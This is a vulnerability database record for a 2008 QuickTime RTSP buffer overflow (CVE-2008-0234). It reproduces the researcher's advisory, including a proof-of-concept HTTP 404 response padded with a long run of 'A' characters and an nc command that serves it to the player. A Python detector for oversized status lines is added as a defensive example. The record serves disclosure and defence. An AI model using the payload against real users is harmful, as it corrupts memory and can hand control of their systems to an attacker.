Apple QuickTime RTSP Connection Status Display Remote Overflow Vulnerability

Vulnerability ID: 1114274
Vulnerability type: buffer overflow
Published: 2008-01-10
Updated: 2008-07-10
CVE: CVE-2008-0234
CNNVD ID: CNNVD-200801-182
Platform: Windows
CVSS score: 9.3
|Vulnerability sources
https://www.exploit-db.com/exploits/4885
https://www.securityfocus.com/bid/27225
https://cxsecurity.com/issue/WLB-2008010036
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200801-182
|Vulnerability details
Apple QuickTime is a multimedia player developed by Apple Inc. (USA). It can handle digital video, media clips and many other kinds of resources. QuickTime has a buffer overflow vulnerability when it fills the LCD-like screen that shows connection status information; a remote malicious server could exploit this to take control of the user's system. If the user follows an rtsp:// link and port 554 on the server is closed, QuickTime automatically switches transport and tries HTTP on port 80, and the LCD-like screen then displays the server's 404 error message.
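As an added defensive example (not part of the advisory or of this database record): a proxy- or IDS-side check that flags HTTP status lines whose reason phrase is far longer than any legitimate server sends, which is the response shape described above. The 64-byte limit and the sample responses are constructed for this example and are not values taken from QuickTime or the advisory.

```python
"""Flag HTTP status lines with oversized reason phrases."""
import re

# Assumed threshold for this example; legitimate reason phrases
# ("Not Found", "OK") are a few words, nowhere near this length.
MAX_REASON_LEN = 64

# RFC 7230 status line: HTTP-version SP status-code SP reason-phrase
_STATUS_LINE = re.compile(rb"^HTTP/(\d)\.(\d) (\d{3}) ?(.*)$")


def check_status_line(line: bytes) -> dict:
    """Return a verdict for one raw status line."""
    m = _STATUS_LINE.match(line.rstrip(b"\r\n"))
    if not m:
        return {"valid": False, "suspicious": True,
                "reason": "malformed status line"}
    phrase = m.group(4)
    verdict = {"valid": True, "status": int(m.group(3)),
               "reason_len": len(phrase), "suspicious": False, "reason": ""}
    if len(phrase) > MAX_REASON_LEN:
        verdict["suspicious"] = True
        verdict["reason"] = (f"reason phrase is {len(phrase)} bytes, "
                             f"limit {MAX_REASON_LEN}")
    return verdict


def scan_responses(responses):
    """Check the status line (first line) of each raw HTTP response."""
    results = []
    for raw in responses:
        lines = raw.splitlines()
        results.append(check_status_line(lines[0] if lines else b""))
    return results


# Constructed sample responses: a normal 404, one shaped like the
# advisory's PoC (long run of 'A' as the reason phrase), a 200, junk.
SAMPLE_RESPONSES = [
    b"HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n",
    b"HTTP/1.1 404 " + b"A" * 1024 + b"xy\r\n\r\n",
    b"HTTP/1.0 200 OK\r\n\r\n",
    b"garbage\r\n",
]

if __name__ == "__main__":
    for verdict in scan_responses(SAMPLE_RESPONSES):
        print(verdict)
```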
|Exploit (EXP)
#######################################################################

                             Luigi Auriemma

Application:  Quicktime Player
              http://www.apple.com/quicktime
Versions:     <= 7.3.1.70
Platforms:    Windows and Mac
Bug:          buffer-overflow
Exploitation: remote
Date:         10 Jan 2008
Thanx to:     swirl for the help during the re-testing of the bug
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Quicktime is a well known media player developed by Apple.


#######################################################################

======
2) Bug
======


The problem is a buffer overflow that happens during the filling of
the LCD-like screen containing info about the status of the connection.

For exploiting this vulnerability it is only needed that a user follows
an rtsp:// link: if port 554 of the server is closed, Quicktime will
automatically change the transport and will try the HTTP protocol on
port 80, and the 404 error message of the server (other error numbers
are valid too) will be visualized in the LCD-like screen.

During my tests I have been able to fully overwrite the return address;
anyway, note that the visible effects of the vulnerability could change
during the usage of the debugger (in attaching mode everything is
ok).


#######################################################################

===========
3) The Code
===========


http://aluigi.org/poc/quicktimebof.txt

quicktimebof.txt
HTTP/1.1 404 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxy

  nc -l -p 80 -v -v -n < quicktimebof.txt

and then

  QuickTimePlayer.exe rtsp://127.0.0.1/file.mp3


#######################################################################

======
4) Fix
======


No fix


#######################################################################

# milw0rm.com [2008-01-10]
|Affected products
Apple TV 2.0
Apple TV 1.1
Apple TV 1.0
Apple QuickTime Player 7.3.1.70
Apple QuickTime Player 7.3.1
Apple QuickTime Player 7.1.6
Apple QuickTime Player 7
|References

US-CERT, VU#112179: http://www.kb.cert.org/vuls/id/112179
VUPEN, ADV-2008-2064: http://www.frsirt.com/english/advisories/2008/2064/references
VUPEN, ADV-2008-0107: http://www.frsirt.com/english/advisories/2008/0107
APPLE, APPLE-SA-2008-07-10: http://lists.apple.com/archives/security-announce/2008//Jul/msg00000.html
XF, quicktime-rtsp-responses-bo(39601): http://xforce.iss.net/xforce/xfdb/39601
SECTRACK, 1019178: http://www.securitytracker.com/id?1019178
BID, 27225: http://www.securityfocus.com/bid/27225
BUGTRAQ, 20080112 Re: Buffer-overflow in Quicktime Player 7.3.1.70: http://www.securityfocus.com/archive/1/archive/1/486268/100/0/threaded
BUGTRAQ, 20080112 Re: Re: Buffer-overflow in Quicktime Player 7.3.1.70: http://www.securityfocus.com/archive/1/archive/1/486241/100/0/threaded
BUGTRAQ, 20080114 Re: [Full-disclosure] Buffer-overflow in Quicktime Player 7.3.1.70: http://www.securityfocus.com/archive/1/archive/1/486238/100/0/threaded